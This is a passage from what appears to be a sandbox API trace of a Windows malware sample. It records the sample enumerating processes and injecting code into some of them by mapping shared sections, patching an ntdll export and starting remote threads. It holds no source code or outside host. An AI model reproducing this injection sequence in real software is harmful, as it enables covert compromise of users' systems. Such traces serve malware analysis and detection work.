(hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0163.611] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0163.611] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0163.612] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0163.613] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0163.613] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0163.613] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0163.613] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0163.613] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0163.613] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0163.613] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x2cf898 | out: lpflOldProtect=0x2cf898*=0x40) returned 1 [0163.613] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x2cf898 | out: lpflOldProtect=0x2cf898*=0x4) returned 1 [0163.615] VirtualQuery (in: lpAddress=0x802cd, lpBuffer=0x2cf890, dwLength=0x1c | out: lpBuffer=0x2cf890*(BaseAddress=0x80000, AllocationBase=0x80000, AllocationProtect=0x40, RegionSize=0x5000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0163.615] GetProcessHeap () returned 0x380000 [0163.615] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x364) returned 0x3a3fe8 [0163.615] RtlMoveMemory (in: Destination=0x3a3fe8, Source=0x802cd, Length=0x363 | out: Destination=0x3a3fe8) [0163.615] GetProcessHeap () returned 0x380000 [0163.615] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0x2000) returned 0x3a4358 [0163.615] RtlMoveMemory (in: Destination=0x3a4358, Source=0x8062f, Length=0x2000 | out: Destination=0x3a4358) [0163.615] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x802cd) returned 0x0 [0163.615] GetCurrentProcessId () returned 0x958 [0163.615] GetProcessHeap () returned 0x380000 [0163.615] RtlAllocateHeap (HeapHandle=0x380000, Flags=0x8, Size=0xa000) returned 0x3a6360 [0163.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0163.619] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0163.619] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0163.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0163.620] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0163.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0163.621] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0163.622] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0163.725] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0163.726] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0163.726] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0163.727] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0163.727] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0163.728] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0163.728] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0163.729] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.729] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0163.729] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0163.730] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0163.730] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0163.731] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0163.732] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0163.732] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0163.732] CloseHandle (hObject=0xec) returned 1 [0163.732] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.732] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0163.732] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0163.733] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0163.733] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0163.733] CloseHandle (hObject=0xec) returned 1 [0163.733] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.733] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0163.733] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0163.734] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0163.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0163.735] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0163.735] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0163.735] CloseHandle (hObject=0xec) returned 1 [0163.735] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0163.737] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0163.737] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0163.737] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.737] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0163.737] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.737] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0163.737] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.737] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0163.737] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x120000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0163.742] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0163.742] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x160000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0163.743] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0163.743] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0163.743] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0163.743] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0163.743] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0163.744] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0163.744] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0163.744] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0163.744] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0163.744] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0163.744] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0163.744] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0163.744] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0163.744] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0163.744] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0163.745] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0163.745] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0163.745] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0163.745] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0163.745] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0163.745] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0163.745] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0163.745] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0120000) returned 0x881f0 [0163.745] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0163.747] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0163.747] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0163.747] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0163.747] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0163.748] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0163.748] GetLastError () returned 0x0 [0163.748] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0163.748] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0163.749] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0163.749] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0163.750] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0163.751] CloseHandle (hObject=0xfc) returned 1 [0163.751] Sleep (dwMilliseconds=0x1f4) [0164.701] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0164.702] CloseHandle (hObject=0xf8) returned 1 [0164.702] CloseHandle (hObject=0xf4) returned 1 [0164.702] CloseHandle (hObject=0xf0) returned 1 [0164.702] CloseHandle (hObject=0xec) returned 1 [0164.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0164.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0164.703] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0164.703] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0164.703] CloseHandle (hObject=0xec) returned 1 [0164.703] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0164.703] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0164.703] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0164.703] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.703] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0164.703] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.703] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0164.703] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.703] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0164.703] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x70000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0164.708] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0164.708] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xc0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0164.708] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0164.709] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0164.709] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0164.709] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0164.709] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0164.709] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0164.709] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0164.709] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0164.709] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0164.709] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0164.710] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0164.710] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0164.710] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0164.710] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0164.710] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0164.710] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0164.710] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0164.710] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0164.710] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0164.710] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0164.711] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0164.711] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0164.711] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0070000) returned 0x881f0 [0164.711] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0164.711] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, 